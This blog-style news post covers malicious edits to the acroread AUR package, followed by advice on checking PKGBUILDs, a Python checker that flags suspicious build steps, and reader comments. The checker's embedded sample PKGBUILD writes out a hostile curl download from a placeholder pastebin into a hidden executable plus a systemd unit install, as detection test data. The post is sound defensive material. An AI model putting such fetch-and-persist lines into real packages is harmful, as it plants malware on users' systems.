Malware Found On The Arch User Repository (AUR)


On July 7, an AUR package was modified with some malicious code, reminding Arch Linux users (and Linux users in general) that all user-generated packages should be checked (when possible) before installation.

The AUR, or Arch (Linux) User Repository, contains package descriptions, known as PKGBUILDs, which make it easier to build packages from source. While these packages are very useful, they should never be treated as safe, and users should always check their contents before using them, when possible. After all, the AUR webpage states in bold that "AUR packages are user produced content. Any use of the provided files is at your own risk."

The discovery of an AUR package containing malicious code illustrates this. acroread was modified on July 7 (it appears it was previously "orphaned", meaning it had no maintainer) by a user named "xeactor" to include a curl command that downloaded a script from a pastebin. That script then downloaded another script and installed a systemd unit to run it periodically.

It appears two other AUR packages were modified in the same way. All the offending packages were removed, and the user account used to upload them (which had been registered on the same day those packages were updated) was suspended.

The malicious code didn't do anything truly harmful - it only tried to upload some system information to Pastebin: the machine ID, the output of uname -a (which includes the kernel version, architecture, etc.), CPU information, pacman information, and the output of systemctl list-units (which lists systemd units). I'm saying "tried" because no system information was actually uploaded, due to an error in the second script (the upload function is named "upload", but the script tried to call it using a different name, "uploader").

Also, the person adding these malicious scripts to the AUR left their personal Pastebin API key in the script in cleartext, proving once again that they don't know exactly what they are doing.

The purpose of trying to upload this information to Pastebin is not clear, especially since much more sensitive data could have been uploaded, like GPG / SSH keys.

Update: Reddit user u/xanaxdroid_ mentions that the same user, "xeactor", also had some cryptocurrency mining packages posted, so he speculates that "xeactor" was probably planning on adding hidden cryptocurrency mining software to the AUR (this was also the case with some Ubuntu Snap packages two months ago). That would explain why "xeactor" was trying to collect various system information. All the packages uploaded by this AUR user have been removed, so I cannot check this.

Another update: What exactly should you check in user-generated packages such as those found in the AUR? This varies and I can't give you an exact recipe, but you can start by looking for anything that tries to download something using curl, wget and other similar tools, and see what exactly they are attempting to download. Also check the server from which the package source is downloaded, and make sure it's the official source. Unfortunately this is not an exact science. For Launchpad PPAs, for example, things get more complicated, as you must know how Debian packaging works, and the source can be altered directly, since it's hosted in the PPA and uploaded by the user. It gets even more complicated with Snap packages, because you cannot check such packages before installation (as far as I know). In these latter cases, and as a generic rule, I guess you should only install user-generated packages if you trust the uploader / packager.
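To make the advice above concrete, here is a small Python checker, added as an example for this post (it is not the article's code and not an Arch or AUR tool). It applies the three checks described: it lists the hosts in the PKGBUILD's source= array and compares them with the hosts you expect for the upstream project, it flags curl/wget-style downloads inside the functions that makepkg executes (prepare, build, package and so on), and it flags installation of systemd units from package(). The PKGBUILD embedded below is a constructed sample modelled on the described acroread change; the hosts, paths and pastebin URL in it are placeholders, not the real ones.

```python
"""Static pre-install check for an AUR PKGBUILD (added example, not from the article).

Flags the things the post says to look for before building a user-submitted package:
  * source= entries whose host is not an expected upstream host
  * network fetches (curl/wget/...) inside build-time functions that makepkg runs
  * systemd units being installed from inside those functions
"""
import re
from dataclasses import dataclass

# Constructed sample PKGBUILD; the pastebin URL and helper path are placeholders.
SAMPLE_PKGBUILD = r"""
# Maintainer: example <someone@example.invalid>
pkgname=acroread
pkgver=9.5.5
pkgrel=9
arch=('x86_64')
source=("https://ardownload.adobe.com/pub/adobe/reader/unix/9.x/${pkgver}/enu/AdbeRdr${pkgver}-1_i486linux_enu.tar.bz2"
        "acroread.desktop")
md5sums=('SKIP' 'SKIP')

package() {
  cd "$srcdir"
  install -Dm644 acroread.desktop "$pkgdir/usr/share/applications/acroread.desktop"
  curl -s https://pastebin.example/raw/PLACEHOLDER -o "$pkgdir/usr/lib/.helper"
  chmod +x "$pkgdir/usr/lib/.helper"
  install -Dm644 x.service "$pkgdir/usr/lib/systemd/system/x.service"
}
"""

FETCH_TOOLS = re.compile(r"\b(curl|wget|aria2c|fetch)\b")
SYSTEMD_PATH = re.compile(r"/(?:usr/lib|etc)/systemd/system/")
# Optional "name::" prefix, then scheme://host ; entries without a scheme are local files.
URL_RE = re.compile(r"^(?:[^:]+::)?[a-z+]+://([^/\s\"']+)", re.IGNORECASE)
FUNC_RE = re.compile(r"^\s*(\w+)\s*\(\)\s*\{", re.MULTILINE)


@dataclass
class Finding:
    kind: str
    detail: str


def extract_sources(text):
    """Return the raw entries of the source=( ... ) array, quotes stripped."""
    m = re.search(r"^source(?:_\w+)?=\((.*?)\)", text, re.MULTILINE | re.DOTALL)
    if not m:
        return []
    tokens = re.findall(r"'[^']*'|\"[^\"]*\"|\S+", m.group(1))
    return [t.strip("'\"") for t in tokens]


def source_hosts(text):
    """Hosts of all remote source= entries (variables like ${pkgver} are left unexpanded)."""
    hosts = set()
    for entry in extract_sources(text):
        m = URL_RE.match(entry)
        if m:
            hosts.add(m.group(1).lower())
    return hosts


def function_bodies(text):
    """Map each shell function name to its body, by counting braces from the opening one."""
    bodies = {}
    for m in FUNC_RE.finditer(text):
        depth, i = 1, m.end()
        while i < len(text) and depth:
            depth += {"{": 1, "}": -1}.get(text[i], 0)
            i += 1
        bodies[m.group(1)] = text[m.end():i - 1]
    return bodies


def check_pkgbuild(text, expected_hosts):
    """Run all three checks; expected_hosts is the set of upstream hosts you consider legitimate."""
    findings = []
    for host in sorted(source_hosts(text)):
        if host not in expected_hosts:
            findings.append(Finding("unexpected-source-host", host))
    for name, body in function_bodies(text).items():
        for line in body.splitlines():
            stripped = line.strip()
            if not stripped or stripped.startswith("#"):
                continue
            if FETCH_TOOLS.search(stripped):
                findings.append(Finding("network-fetch-in-function", f"{name}(): {stripped}"))
            if SYSTEMD_PATH.search(stripped):
                findings.append(Finding("systemd-unit-install", f"{name}(): {stripped}"))
    return findings


if __name__ == "__main__":
    # Assumed upstream host for the sample; for a real package, take it from the project's site.
    for f in check_pkgbuild(SAMPLE_PKGBUILD, {"ardownload.adobe.com"}):
        print(f"{f.kind}: {f.detail}")
```

Run against the sample, the source host passes (Adobe's download server is the expected one), but the curl line and the systemd unit install inside package() are reported. This is only a first pass over the build script: a PKGBUILD is a bash file, so anything the regexes do not recognise (variables assembled at run time, scripts pulled in by the sources themselves) still has to be read by hand, which is the point the post makes.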

from Reddit


  1. A small typo - It was on July 7 - not June.
    The malicious script was removed within approx. 9 hours

  2. The package name is acroread, as a shortening for Acrobat Reader, not acrored.

  3. Wow! Who is checking the packages for malicious code? That's really quick response. But I wonder if it's possible that there are undiscovered malicious packages.

  4. Quote: "But I wonder if it's possible that there are undiscovered malicious packages."

    It's all about trust. Wonder what percentage of Arch users are capable of questioning, and then actually being capable of checking and finding malware in compiled languages like C in official and/or AUR packages?

    I am migrating to Fedora because of recent discoveries I have made involving lead pacman and Arch project devs, managers.

    I no longer trust either of these people based on empirical evidence from past behavior, available for anyone to read who is curious enough to discover the truth.

  5. Forgot to include, "as a user with 9 years of Arch usage" to above.

    1. never forget appeal to authority, that's the most important part of making an argument with no sources.

  6. This is less about scanning huge amounts of C or other code. More about checking a small AUR build script does not download anything from an unexplainable source, and does not run anything nasty such as "rm -rf".

    Most Arch users should be competent to do that.

  7. I'm now very curious about the allegations being levied against people I rely on, but when it comes to the AUR, there's no relation to these project leaders. There are no guarantees, or even implied guarantees, when it comes to almost all Linux distros. But when it comes to the AUR, it's pretty much the wild west; it's a bunch of recipes and sources, and it's dangerous to Arch in the same way PPAs are dangerous to Ubuntu.
